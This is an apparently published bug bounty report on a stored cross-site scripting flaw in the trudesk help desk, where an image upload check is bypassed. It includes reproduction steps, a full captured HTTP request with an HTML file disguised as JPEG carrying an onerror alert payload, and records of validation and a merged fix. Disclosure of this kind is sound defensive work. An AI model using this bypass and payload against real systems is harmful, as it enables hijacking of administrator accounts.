Cross-site Scripting (XSS) - Stored in polonel/trudesk

Valid
Reported on Jun 14th 2021

💥 BUG

Stored xss bug using file upload against admin .

💥 SUMMURY

Here trudesk only allow to upload image file but it can be bypassed and attacker can upload html file . As html file can serve any javascript code ,so attacker can execute any javascript code in vicitm trudesk account .

💥 IMPACT

lower level user can make xss attack against admin . Using xss bug attacker can execute arbitary javascript in victim account . Thus lower level user can execute arbitary javascript in admin account using this xss and can change his role . External any user also can execute this xss attack

💥 STEP TO REPRODUCE

1. First from admin goto http://localhost:8118/settings/tickets and grav your ticketing url http://localhost:8118/newissue .

2. Now as a external user goto http://localhost:8118/newissue and create a new ticket and upload a file to this ticket .
During upload capture the request in burpsuite or other proxy tool and modify the request and sent .(check my modified request bellow)\

POST /tickets/uploadmdeimage HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
ticketid: 60c632a56e8507002262a20a
Content-Type: multipart/form-data; boundary=---------------------------180995348964997762475964139
Content-Length: 303
Origin: http://localhost:8118
Connection: close
Referer: http://localhost:8118/tickets/1004
Cookie: PHPSESSID=n3ofevpn16pm9p45ngraltrbtk; SMFCookie600=a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A40%3A%220bf82305176bf11c423867c0f41a1f7944174f1e%22%3Bi%3A2%3Bi%3A1812778653%3Bi%3A3%3Bi%3A2%3B%7D; ElkArteCookie700=%5B1%2C%22b34b4193d3296f9b57616347174aaf58503bf2226225496e5a159745bea75aba%22%2C1812793345%2C2%5D; _csrf=X6SB4CbNToC6T0TuClv-MPqa; express.sid=s%3A5tJvaz7mQH_plOxJ0Qm39QiZ0gZ6hpQ2.J5ipJrnNm3tGCLsqbRWuvnbIJBLL9XC3vHMTg4DEHCo; $trudesk%3Atimezone=America/New_York; connect.sid=s%3APvO_kBBiQoJLhJ-OvfW6Zgv0zwLxrTD0.owzip3EbVPWPph8Ac2o7Al34KE5gNPk08e0eyd%2B%2Bze4; io=OZOl201f1Xf9jNMuAAAN; $trudesk%3Asidebar%3Aexpanded=false

-----------------------------180995348964997762475964139
Content-Disposition: form-data; name="file"; filename="image-1623649594549.jpeg.html"
Content-Type: image/jpeg

<?php echo "hi";?>
xss"'><img src=x onerror=alert(document.domain)>
-----------------------------180995348964997762475964139--

After upload uploaded file link will be like http://localhost:8118/uploads/tickets/60c632a56e8507002262a20a/inline_abc7eb397f33100f8e62.html Open this link and see xss is excuted . Any user/admin if open this link then xss is performed

image

STUDY

https://owasp.org/www-community/attacks/xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

ranjit-git modified their report
a month ago
Chris Brame validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
$25
The fix bounty is now up for grabs
$6.25
Chris Brame confirmed that a fix has been merged on caaec1 a month ago
Chris Brame has been awarded the fix bounty
$6.25